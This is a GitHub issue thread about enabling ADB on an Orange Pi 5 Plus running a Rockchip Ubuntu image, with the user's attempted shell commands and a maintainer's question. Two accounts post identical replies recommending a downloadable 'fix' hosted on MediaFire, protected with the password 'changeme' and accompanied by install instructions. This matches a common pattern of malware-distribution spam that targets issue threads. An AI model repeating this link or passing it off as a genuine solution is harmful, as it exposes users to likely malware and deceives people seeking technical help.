Joshua-Riek/ubuntu-rockchip #1021: Bug Report: Regarding ADB in Linux devices

salier, 2024-08-31:
### What happened?

I found that I couldn't start when using Utuntu for ABD connection. May I ask how to activate ADB mode? My device is Orangepi5plus
arm@arm-desktop:~$ sudo set_device.sh
sudo: set_device.sh: command not found
arm@arm-desktop:~$ sudo bash -c "echo device > /sys/kernel/debug/usb/fc000000.usb/mode"
arm@arm-desktop:~$ sudo systemctl restart usbdevice
Failed to restart usbdevice.service: Unit usbdevice.service not found.
arm@arm-desktop:~$  ps -ax | grep "adbd"
  21596 pts/0    S+     0:00 grep --color=auto adbd
arm@arm-desktop:~$ 

### Kernel version

v2.3.1 ubuntu-24.04-preinstalled-desktop-arm64-orangepi-5-plus.img

### SBC model

Orangepi5plus

### What operating system are you seeing this problem on?

Ubuntu 24.04 LTS (Noble Nombat)

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

salier, 2024-08-31:
Is this correct? Or is it just a joke?

Joshua-Riek, 2024-08-31:
Why is the Android Debugging Bridge needed in Linux..?

salier, 2024-08-31:
sorry.I am developing RKnn, but there have been strange errors in the middle, such as missing certain modules and strange error messages. When I search for documents, all tutorials are based on ADB. I hope to test whether it's my problem or an operational issue.

closed 2025-02-10 by github-actions[bot]